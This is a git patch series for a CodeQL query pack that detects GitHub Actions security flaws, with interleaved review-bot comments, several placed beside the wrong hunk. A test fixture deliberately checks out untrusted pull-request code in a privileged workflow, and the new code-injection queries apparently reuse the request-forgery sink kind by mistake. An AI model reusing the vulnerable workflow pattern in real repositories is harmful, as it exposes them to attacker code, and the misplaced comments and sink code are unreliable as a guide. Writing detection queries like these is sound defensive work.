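Review bot: The comment on the third branch of the first hunk has a typo: `// heuristic base on the step id and field name` should read `// heuristic based on the step id and field name`. The first branch now accepts any `Expression e` with local flow into `ref` instead of the argument itself, which only still covers the direct `ref: ${{ github.event.pull_request.head.sha }}` case because `hasLocalFlow` was made reflexive in the DataFlowPublic hunk of this same patch (presuming hasLocalFlowExpr wraps it); a comment on the branch such as `// relies on hasLocalFlow being reflexive: e may be the ref argument itself` would keep that coupling visible to whoever next edits either predicate. The second hunk is a pure removal of the branch that moved up. ActionsCheckout's class header is the hunk heading, so the class starts before the first hunk.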
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
@@ -3,23 +3,13 @@ on:
 jobs:
 build:
- name: Build and test
 runs-on: ubuntu-latest
+ env:
+ HEAD: ${{ github.event.pull_request.head.sha }}
 steps:
- - uses: actions/checkout@v2
- with:
- ref: ${{ github.event.pull_request.head.sha }}
-
- - uses: actions/setup-node@v1
- run: |
- npm install
- npm build
-
- - uses: completely/fakeaction@v2
- with:
- arg1: ${{ secrets.supersecret }}
-
- - uses: fakerepo/comment-on-pr@v1
- with:
- message: |
- Thank you!
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ env.HEAD }}
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
index 48b7b762605c..c3a3ec2f988c 100644
--- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
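Review bot: The distinctive case in the rewritten job is the second checkout, whose `ref: ${{ env.HEAD }}` reaches the PR head only through the job-level `env:`, while the first checkout repeats the direct-expression case; a comment on the second step such as `# head sha arrives via job env: exercises local flow into ref` would say why the fixture was rewritten. The removed `completely/fakeaction` and `fakerepo/comment-on-pr` steps also backed two UnpinnedActionsTag rows that this patch deletes from the expected file, leaving those unpinned-action cases covered only by label_trusted_checkout.yml as far as the expected output shows; that is acceptable, but worth stating in the commit message.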
@@ -3,14 +3,12 @@ | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head 
from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 
'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | -| .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Uses Step | -| .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index a6f02e7752a2..cf9d6c01d49c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected 
@@ -1,10 +1,10 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:17:9:23:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:31:9:37:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:46:9:50:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:50:9:53:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. 
| | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | @@ -18,4 +18,5 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 5130135df0a87da6f23eba4b81b11383b254b19a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:14:55 +0100 Subject: [PATCH 109/707] fix(stepsExpression): allow steps from a composite action to communicate --- ql/lib/codeql/actions/ast/internal/Ast.qll | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5c6ce37fa928..f45565caed77 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -855,7 +855,14 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getEnclosingJob() = result.getEnclosingJob() and + ( + this.getEnclosingJob() = result.getEnclosingJob() + or + exists(CompositeActionImpl a | + a.getAChildNode*() = this and + a.getAChildNode*() = result + ) + ) and result.(StepImpl).getId() = stepId } From cfed2d4ce029136bab61eefaaf666c77ecbff8d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:30:23 +0100 Subject: [PATCH 110/707] Split queries --- ql/src/Security/CWE-078/CommandInjection.ql | 38 +++++++++++++++ .../CWE-078/CriticalCommandInjection.ql | 44 ++++++++++++++++++ ql/src/Security/CWE-094/CodeInjection.ql | 40 ++++++++++++++++ .../Security/CWE-094/CriticalCodeInjection.ql | 46 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 +- ql/src/Security/CWE-918/RequestForgery.ql | 37 +++++++++++++++ 6 files changed, 206 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-078/CommandInjection.ql create mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql create mode 100644 ql/src/Security/CWE-094/CodeInjection.ql create mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql create mode 100644 ql/src/Security/CWE-918/RequestForgery.ql diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql new file mode 100644 index 000000000000..2a2225e17b6e --- /dev/null +++ b/ql/src/Security/CWE-078/CommandInjection.ql 
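Review bot: The new composite-action branch of `getTarget()` carries no QLDoc saying which scope a 'steps.<id>' reference is resolved in, and it does so with two reflexive-transitive closures `a.getAChildNode*()` over the whole action AST where the job branch uses a single accessor. A comment such as `/** Gets the step with id 'stepId' in the same job, or in the same composite action, as this expression. */` would make the rule explicit for the data-flow code that relies on it. If the library has an enclosing-composite-action accessor analogous to `getEnclosingJob()`, `this.getEnclosingCompositeAction() = result.getEnclosingCompositeAction()` would read like the job branch and avoid the closure; I cannot see whether such a predicate exists. The enclosing class `StepsExpressionImpl` starts outside the hunk.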
@@ -0,0 +1,38 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql new file mode 100644 index 000000000000..3834b0ac0d06 --- /dev/null +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql 
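Review bot: The sink class and the `MyConfig` module in this new file are copied verbatim into the sibling CriticalCommandInjection.ql, so any later change to sink kinds or barriers has to be made twice and the two queries can drift apart. Moving `CommandInjectionSink` and the config into a shared library module (for example `codeql/actions/security/CommandInjectionQuery.qll`) and importing it from both queries would leave the critical variant with only its trigger filter. The names `MyConfig`/`MyFlow` also read as placeholders; `CommandInjectionConfig`/`CommandInjectionFlow` would match the sink class. Note too that the select ends with `sink.getNode().asExpr().(Expression).getRawExpression()`, which silently drops any sink whose expression is not an `Expression`; if every externally defined sink is guaranteed to be one, a one-line comment saying so would help the next reader.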
@@ -0,0 +1,44 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w +where + MyFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql new file mode 100644 index 000000000000..7ad0e98bc492 --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjection.ql 
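Review bot: The privilege filter binds `w = source.getNode().asExpr().getEnclosingWorkflow()`, so a source that sits in a composite action (an action.yml rather than a workflow) has no enclosing Workflow and its flow is silently dropped from the critical query, even though the non-critical variant still reports it. Likewise every `ReusableWorkflow` is treated as privileged regardless of what calls it, which may be deliberate but is undocumented. A comment above the `where` clause, e.g. `// Report only when the source's workflow runs on a trigger that exposes that source, or is a reusable workflow (caller's trigger and permissions unknown); sources inside composite actions are intentionally not covered here.`, would record both decisions, or the composite-action case should be handled if the exclusion is not intended.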
@@ -0,0 +1,40 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql new file mode 100644 index 000000000000..5a4bbaca034a --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql 
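Review bot: This non-critical variant applies no trigger check, so a result may come from a workflow whose only triggers are unprivileged (e.g. `pull_request` from a fork, where the token is read-only and secrets are not exposed), yet the `@description` reads the same as a full remote-code-execution finding. Extending it, e.g. `@description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary code execution. This query does not check the workflow trigger, so the real impact depends on the permissions and secrets available to the workflow.`, would tell a triager why the severity is `warning`. The `external/cwe/cwe-116` tag also looks like a stretch for an Actions code-injection query; CWE-094/095 are what the modeled sinks describe.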
@@ -0,0 +1,46 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w +where + MyFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 33d6260203ef..d59cc07cad26 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql 
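Review bot: `w instanceof ReusableWorkflow` makes every flow inside a `workflow_call` workflow critical regardless of the caller, and nothing in the file explains that choice, while the `MyConfig` module is an exact copy of the one in CodeInjection.ql. A comment such as `// Reusable workflows inherit the caller's trigger and permissions, which are not known here, so they are conservatively treated as privileged.` would document the first; sharing the config through a library module would remove the second. Because `w` is derived from the source's enclosing workflow, a source located in a composite action is also dropped here; if that is intended, say so in the same comment.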
@@ -20,8 +20,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, - ["expression-injection", "command-injection", "request-forgery", "code-injection"]) + externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql new file mode 100644 index 000000000000..3675597fcd74 --- /dev/null +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -0,0 +1,37 @@ +/** + * @name Uncontrolled data used in network request + * @description Sending network requests with user-controlled data allows for request forgery attacks. + * @kind path-problem + * @problem.severity error + * @security-severity 9.1 + * @precision high + * @id actions/request-forgery + * @tags actions + * security + * external/cwe/cwe-918 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() From a9057a738600f2b01b3bfb8757fc0f7b1ead0cde Mon Sep 17 00:00:00 2001 
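Review bot: Narrowing `ExpressionInjectionSink` to the `expression-injection` kind removes the `command-injection`, `request-forgery` and `code-injection` sinks from the one query that, as far as this diff shows, is currently run by the default `actions-code-scanning` suite; unless that suite also lists the four new queries, the split silently reduces coverage for users of the default suite. I cannot see the suite file here, so please confirm it enumerates the new queries or switch it to tag-based selection. A one-line comment above the predicate, e.g. `// Command, code and request-forgery sinks are reported by their own queries under CWE-078/094/918.`, would also stop the next reader re-adding them.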
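Review bot: RequestForgery.ql is tagged `@problem.severity error` and `@security-severity 9.1` without the trigger filter that the critical command/code-injection variants apply, so a URL built from a `pull_request`-triggered source in an unprivileged workflow is reported at the same severity as one in a `pull_request_target` workflow. Either add a critical variant with the same `hasTriggerEvent` gate and downgrade this query to `warning`, or add a comment above the header stating why request forgery is treated as critical unconditionally. `MyConfig`/`MyFlow` are also duplicated from the other new queries and would be better shared through a library module.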
From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 17:10:35 +0100 Subject: [PATCH 111/707] Add `suite` input --- .github/action/src/codeql.ts | 2 +- action.yml | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 48750388e570..4870ca279551 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: "codeql-suites/actions-code-scanning.qls", + suite: `codeql-suites/${core.getInput("suite")}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; diff --git a/action.yml b/action.yml index 61fd380c4189..a294e9814931 100644 --- a/action.yml +++ b/action.yml @@ -14,6 +14,10 @@ inputs: description: "SARIF File Output" default: "codeql-actions.sarif" + suite: + description: "CodeQL Suite to run" + default: "actions-code-scanning" + runs: using: 'composite' steps: From 678f99b6be23d957b45fd654b9eca9d8d31ada0d Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:14:33 +0000 Subject: [PATCH 112/707] build --- .github/action/dist/index.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index e931e22d3f8a..61c4f537ad9f 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28607,7 +28607,7 @@ async function newCodeQL() { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: "codeql-suites/actions-code-scanning.qls", + suite: `codeql-suites/${core.getInput("suite")}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From a9aba88bc5138ad70b88b7f7d116b048171657bc Mon Sep 17 00:00:00 2001 
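Review bot: `core.getInput("suite")` is spliced straight into the suite path, so an empty input (the action.yml default only applies when the action is invoked through action.yml) yields `codeql-suites/.qls`, and a value containing `/` or `..` resolves to a file outside `codeql-suites`, surfacing as a confusing CodeQL error later rather than a clear one here. The value comes from the workflow author, so this is robustness rather than a trust-boundary issue, but a guard such as `const suite = core.getInput("suite"); if (!/^[\w.-]+$/.test(suite)) throw new Error("invalid suite name: " + suite);` before the interpolation would fail fast. `newCodeQL()` starts and ends outside the hunk.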
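Review bot: The new `suite` input's description does not say what values are accepted, which matters because the value is used as a file name under `codeql-suites/`. `description: "Name of the query suite to run: a file under codeql-suites/ without the .qls extension (e.g. actions-code-scanning)"` would make the contract visible to workflow authors.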
From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 17:21:26 +0100 Subject: [PATCH 113/707] Add alternate value --- .github/action/src/codeql.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 4870ca279551..56615fa80cee 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: `codeql-suites/${core.getInput("suite")}.qls`, + suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From 53209a26b18e2679840fc1ef084bbd984c0bfaf1 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:22:34 +0000 Subject: [PATCH 114/707] build --- .github/action/dist/index.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 61c4f537ad9f..4c98f1d63012 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28607,7 +28607,7 @@ async function newCodeQL() { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: `codeql-suites/${core.getInput("suite")}.qls`, + suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From 70dd7fe18fa7e58d3d89def920a39120b621c07d Mon Sep 17 00:00:00 2001 
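Review bot: The fallback literal `"actions-code-scanning"` duplicates the `default:` declared for the `suite` input in action.yml, so the two can drift apart without any error. Hoisting it into a named constant with a pointer back, `const DEFAULT_SUITE = "actions-code-scanning"; // keep in sync with inputs.suite.default in action.yml`, and using `core.getInput("suite") || DEFAULT_SUITE` here keeps one place to update. `newCodeQL()` starts and ends outside the hunk.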
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 17:47:20 +0100 Subject: [PATCH 115/707] Apply suggestions from code review Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com> --- ql/src/Security/CWE-078/CommandInjection.ql | 2 +- ql/src/Security/CWE-078/CriticalCommandInjection.ql | 4 ++-- ql/src/Security/CWE-094/CodeInjection.ql | 4 ++-- ql/src/Security/CWE-094/CriticalCodeInjection.ql | 6 +++--- ql/src/Security/CWE-918/RequestForgery.ql | 2 +- 5 files changed, 9 insertions(+), 9 deletions(-) diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 2a2225e17b6e..9891f786f7cb 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -34,5 +34,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql index 3834b0ac0d06..5d418ec18161 100644 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/command-injection + * @id actions/critical-command-injection * @tags actions * security * external/cwe/cwe-078 
